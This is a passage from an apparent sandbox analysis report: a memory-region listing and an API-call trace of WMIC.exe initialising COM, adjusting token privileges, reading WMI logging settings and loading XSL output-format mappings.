"\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2408 start_va = 0x1020000 end_va = 0x1108fff entry_point = 0x1020000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2409 start_va = 0xd90000 end_va = 0xd93fff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 2410 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 2411 start_va = 0x1160000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 2412 start_va = 0x1020000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2413 start_va = 0x1160000 end_va = 0x128ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 2414 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 2415 start_va = 0xdf0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 2416 start_va = 0x56b0000 end_va = 0x589ffff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 2417 start_va = 0x1160000 end_va = 0x123efff entry_point = 0x1160000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2418 start_va = 0x1280000 end_va = 0x128ffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 2419 start_va = 0x58a0000 end_va = 0x5c9ffff entry_point = 0x0 region_type = private name = "private_0x00000000058a0000" filename = "" Region: id = 2420 start_va = 0xdf0000 end_va = 0xdf0fff entry_point = 0xdf0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 2421 start_va = 0xe10000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 2422 start_va = 0x1020000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2423 start_va = 0x10b0000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2424 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2425 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2426 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2427 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2428 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2429 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2430 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2431 start_va = 0x1040000 end_va = 0x1069fff entry_point = 0x1040000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2432 start_va = 0x56b0000 end_va = 0x5837fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000056b0000" filename = "" Region: id = 2433 start_va = 0x5890000 end_va = 0x589ffff entry_point = 0x0 region_type = private name = "private_0x0000000005890000" filename = "" Region: id = 2434 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2435 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2436 start_va = 0xe00000 end_va = 0xe0ffff entry_point = 0xe00000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 2437 start_va = 0x5ca0000 end_va = 0x5e20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ca0000" filename = "" Region: id = 2438 start_va = 0x5e30000 end_va = 0x722ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005e30000" filename = "" Region: id = 2439 start_va = 0x1040000 end_va = 0x1040fff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 2440 start_va = 0x1050000 end_va = 0x1050fff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 2441 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2442 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2443 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2444 start_va = 0x7230000 end_va = 0x73bffff entry_point = 0x0 region_type = private name = "private_0x0000000007230000" filename = "" Region: id = 2445 start_va = 0x1060000 end_va = 0x1060fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001060000" filename = "" Region: id = 2446 start_va = 0x7230000 end_va = 0x72e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007230000" filename = "" Region: id = 2447 start_va = 0x73b0000 end_va = 0x73bffff entry_point = 0x0 region_type = private name = "private_0x00000000073b0000" filename = "" Region: id = 2448 start_va = 0x1060000 end_va = 0x1063fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001060000" filename = "" Region: id = 2449 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2450 start_va = 0x73c0000 end_va = 0x74bffff entry_point = 0x0 region_type = private name = "private_0x00000000073c0000" filename = "" Region: id = 2451 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2452 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2453 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 2454 start_va = 0x10c0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 2455 start_va = 0x1100000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2456 start_va = 0x1240000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 2457 start_va = 0x12c0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 2458 start_va = 0x5840000 end_va = 0x587ffff entry_point = 0x0 region_type = private name = "private_0x0000000005840000" filename = "" Region: id = 2459 start_va = 0x7ed6a000 end_va = 0x7ed6cfff entry_point = 0x0 region_type = private name = "private_0x000000007ed6a000" filename = "" Region: id = 2460 start_va = 0x7ed6d000 end_va = 0x7ed6ffff entry_point = 0x0 region_type = private name = "private_0x000000007ed6d000" filename = "" Region: id = 2461 start_va = 0x7ee94000 end_va = 0x7ee96fff entry_point = 0x0 region_type = private name = "private_0x000000007ee94000" filename = "" Region: id = 2462 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2463 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2464 start_va = 0x1290000 end_va = 0x12a4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 2465 start_va = 0x72f0000 end_va = 0x7318fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072f0000" filename = "" Thread: id = 186 os_tid = 0xd70 [0107.972] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0107.972] __set_app_type (_Type=0x1) [0107.972] __p__fmode () returned 0x77ac4d6c [0107.972] __p__commode () returned 0x77ac5b1c [0107.972] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0107.972] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0107.973] ??0CHString@@QAE@XZ () returned 0x13495ec [0107.973] ??0CHString@@QAE@XZ () returned 0x13498fc [0107.973] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0107.973] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0107.973] _onexit (_Func=0x1340a20) returned 0x1340a20 [0107.973] _onexit (_Func=0x1340a30) returned 0x1340a30 [0107.973] _onexit (_Func=0x1340a50) returned 0x1340a50 [0107.973] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.973] ResolveDelayLoadedAPI () returned 0x770fcd50 [0107.973] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0107.976] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0107.985] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xe20500) returned 0x0 [0108.004] GetCurrentProcess () returned 0xffffffff [0108.004] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xd4fc30 | out: TokenHandle=0xd4fc30*=0x158) returned 1 [0108.004] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xd4fc2c | out: TokenInformation=0x0, ReturnLength=0xd4fc2c) returned 0 [0108.004] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x1153a08, TokenInformationLength=0x118, ReturnLength=0xd4fc2c | out: TokenInformation=0x1153a08, ReturnLength=0xd4fc2c) returned 1 [0108.004] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x1153a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0108.004] CloseHandle (hObject=0x158) returned 1 [0108.004] SetThreadUILanguage (LangId=0x0) returned 0x409 [0108.008] _vsnwprintf (in: _Buffer=0x1153a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xd4fbb8 | out: _Buffer="ms_409") returned 6 [0108.008] GetComputerNameW (in: lpBuffer=0x1153ae0, nSize=0xd4fc1c | out: lpBuffer="LHNIWSJ", nSize=0xd4fc1c) returned 1 [0108.008] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.008] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.008] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0108.008] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xd4fc30 | out: lpNameBuffer=0x0, nSize=0xd4fc30) returned 0x0 [0108.009] GetLastError () returned 0xea [0108.009] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1153b20, nSize=0xd4fc30 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xd4fc30) returned 0x1 [0108.009] lstrlenW (lpString="") returned 0 [0108.009] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0108.010] lstrlenW (lpString=".") returned 1 [0108.010] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.011] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0108.011] lstrlenW (lpString="LOCALHOST") returned 9 [0108.011] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.011] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0108.011] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.011] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.011] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0108.011] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.011] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.011] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.011] lstrlenW (lpString="LHNIWSJ") returned 7 [0108.011] ResolveDelayLoadedAPI () returned 0x77bb9840 [0108.013] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.013] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.013] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.013] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.013] SysStringLen (param_1="IMPERSONATE") returned 0xb [0108.013] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.013] SysStringLen (param_1="IMPERSONATE") returned 0xb [0108.013] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.013] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.013] SysStringLen (param_1="IMPERSONATE") returned 0xb [0108.013] SysStringLen (param_1="DELEGATE") returned 0x8 [0108.013] SysStringLen (param_1="IDENTIFY") returned 0x8 [0108.013] SysStringLen (param_1="DELEGATE") returned 0x8 [0108.013] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.013] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0108.013] SysStringLen (param_1="DELEGATE") returned 0x8 [0108.013] SysStringLen (param_1="NONE") returned 0x4 [0108.013] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.013] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.013] SysStringLen (param_1="NONE") returned 0x4 [0108.013] SysStringLen (param_1="CONNECT") returned 0x7 [0108.013] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.014] SysStringLen (param_1="CALL") returned 0x4 [0108.014] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.014] SysStringLen (param_1="CALL") returned 0x4 [0108.014] SysStringLen (param_1="CONNECT") returned 0x7 [0108.014] SysStringLen (param_1="PKT") returned 0x3 [0108.014] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.014] SysStringLen (param_1="PKT") returned 0x3 [0108.014] SysStringLen (param_1="NONE") returned 0x4 [0108.014] SysStringLen (param_1="NONE") returned 0x4 [0108.014] SysStringLen (param_1="PKT") returned 0x3 [0108.014] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.014] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.014] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.014] SysStringLen (param_1="NONE") returned 0x4 [0108.014] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.014] SysStringLen (param_1="PKT") returned 0x3 [0108.014] SysStringLen (param_1="PKT") returned 0x3 [0108.014] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.014] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0108.014] SysStringLen (param_1="DEFAULT") returned 0x7 [0108.014] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0108.014] SysStringLen (param_1="PKT") returned 0x3 [0108.014] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0108.014] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.014] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0108.014] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0108.015] GetSystemDirectoryW (in: lpBuffer=0x11529d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0108.015] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0108.015] SysStringLen (param_1="\\wbem\\") returned 0x6 [0108.015] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0108.015] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0108.015] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0108.015] GetCurrentThreadId () returned 0xd70 [0108.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xd4f740 | out: phkResult=0xd4f740*=0x164) returned 0x0 [0108.015] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xd4f74c, lpcbData=0xd4f748*=0x400 | out: lpType=0x0, lpData=0xd4f74c*=0x30, lpcbData=0xd4f748*=0x4) returned 0x0 [0108.015] _wcsicmp (_String1="0", _String2="1") returned -1 [0108.015] _wcsicmp (_String1="0", _String2="2") returned -2 [0108.015] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xd4f748*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xd4f748*=0x42) returned 0x0 [0108.015] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x1152be0, lpcbData=0xd4f748*=0x42 | out: lpType=0x0, lpData=0x1152be0*=0x25, lpcbData=0xd4f748*=0x42) returned 0x0 [0108.015] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0108.015] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0108.015] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xd4f74c, lpcbData=0xd4f748*=0x400 | out: lpType=0x0, lpData=0xd4f74c*=0x36, lpcbData=0xd4f748*=0xc) returned 0x0 [0108.015] _wtol (_String="65536") returned 65536 [0108.015] RegCloseKey (hKey=0x0) returned 0x6 [0108.015] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xd4fbe0 | out: ppv=0xd4fbe0*=0x12b45a8) returned 0x0 [0108.027] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x12b45a8, xmlSource=0xd4fb60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xd4fbc4 | out: isSuccessful=0xd4fbc4*=0xffff) returned 0x0 [0108.148] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x12b45a8, DOMElement=0xd4fbd8 | out: DOMElement=0xd4fbd8) returned 0x0 [0108.149] SysStringLen (param_1="VALUE") returned 0x5 [0108.149] SysStringLen (param_1="TABLE") returned 0x5 [0108.150] SysStringLen (param_1="TABLE") returned 0x5 [0108.150] SysStringLen (param_1="VALUE") returned 0x5 [0108.150] SysStringLen (param_1="LIST") returned 0x4 [0108.150] SysStringLen (param_1="TABLE") returned 0x5 [0108.151] SysStringLen (param_1="RAWXML") returned 0x6 [0108.151] SysStringLen (param_1="TABLE") returned 0x5 [0108.151] SysStringLen (param_1="RAWXML") returned 0x6 [0108.151] SysStringLen (param_1="LIST") returned 0x4 [0108.151] SysStringLen (param_1="LIST") returned 0x4 [0108.151] SysStringLen (param_1="RAWXML") returned 0x6 [0108.151] SysStringLen (param_1="HTABLE") returned 0x6 [0108.151] SysStringLen (param_1="TABLE") returned 0x5 [0108.151] SysStringLen (param_1="HTABLE") returned 0x6 [0108.151] SysStringLen (param_1="LIST") returned 0x4 [0108.152] SysStringLen (param_1="HFORM") returned 0x5 [0108.152] SysStringLen (param_1="TABLE") returned 0x5 [0108.152] SysStringLen (param_1="HFORM") returned 0x5 [0108.152] SysStringLen (param_1="LIST") returned 0x4 [0108.152] SysStringLen (param_1="HFORM") returned 0x5 [0108.152] SysStringLen (param_1="HTABLE") returned 0x6 [0108.152] SysStringLen (param_1="XML") returned 0x3 [0108.152] SysStringLen (param_1="TABLE") returned 0x5 [0108.152] SysStringLen (param_1="XML") returned 0x3 [0108.152] SysStringLen (param_1="VALUE") returned 0x5 [0108.152] SysStringLen (param_1="VALUE") returned 0x5 [0108.152] SysStringLen (param_1="XML") returned 0x3 [0108.153] SysStringLen (param_1="MOF") returned 0x3 [0108.153] SysStringLen (param_1="TABLE") returned 0x5 [0108.153] SysStringLen (param_1="MOF") returned 0x3 [0108.153] SysStringLen (param_1="LIST") returned 0x4 [0108.153] SysStringLen (param_1="MOF") returned 0x3 [0108.153] SysStringLen (param_1="RAWXML") returned 0x6 [0108.153] SysStringLen (param_1="LIST") returned 0x4 [0108.153] SysStringLen (param_1="MOF") returned 0x3 [0108.154] SysStringLen (param_1="CSV") returned 0x3 [0108.154] SysStringLen (param_1="TABLE") returned 0x5 [0108.154] SysStringLen (param_1="CSV") returned 0x3 [0108.154] SysStringLen (param_1="LIST") returned 0x4 [0108.154] SysStringLen (param_1="CSV") returned 0x3 [0108.154] SysStringLen (param_1="HTABLE") returned 0x6 [0108.154] SysStringLen (param_1="CSV") returned 0x3 [0108.154] SysStringLen (param_1="HFORM") returned 0x5 [0108.154] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.154] SysStringLen (param_1="TABLE") returned 0x5 [0108.154] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.154] SysStringLen (param_1="VALUE") returned 0x5 [0108.155] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.155] SysStringLen (param_1="XML") returned 0x3 [0108.155] SysStringLen (param_1="XML") returned 0x3 [0108.155] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.155] SysStringLen (param_1="texttablewsys") returned 0xd [0108.155] SysStringLen (param_1="TABLE") returned 0x5 [0108.155] SysStringLen (param_1="texttablewsys") returned 0xd [0108.155] SysStringLen (param_1="XML") returned 0x3 [0108.155] SysStringLen (param_1="texttablewsys") returned 0xd [0108.155] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.155] SysStringLen (param_1="XML") returned 0x3 [0108.155] SysStringLen (param_1="texttablewsys") returned 0xd [0108.156] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.156] SysStringLen (param_1="TABLE") returned 0x5 [0108.156] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.156] SysStringLen (param_1="XML") returned 0x3 [0108.156] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.156] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.156] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.156] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.156] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.156] SysStringLen (param_1="TABLE") returned 0x5 [0108.156] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.156] SysStringLen (param_1="XML") returned 0x3 [0108.156] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.156] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.156] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.156] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.156] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.157] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0108.157] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.157] SysStringLen (param_1="TABLE") returned 0x5 [0108.157] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.157] SysStringLen (param_1="XML") returned 0x3 [0108.157] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.157] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0108.157] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.157] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.157] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0108.157] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0108.158] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.158] SysStringLen (param_1="TABLE") returned 0x5 [0108.158] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0108.158] 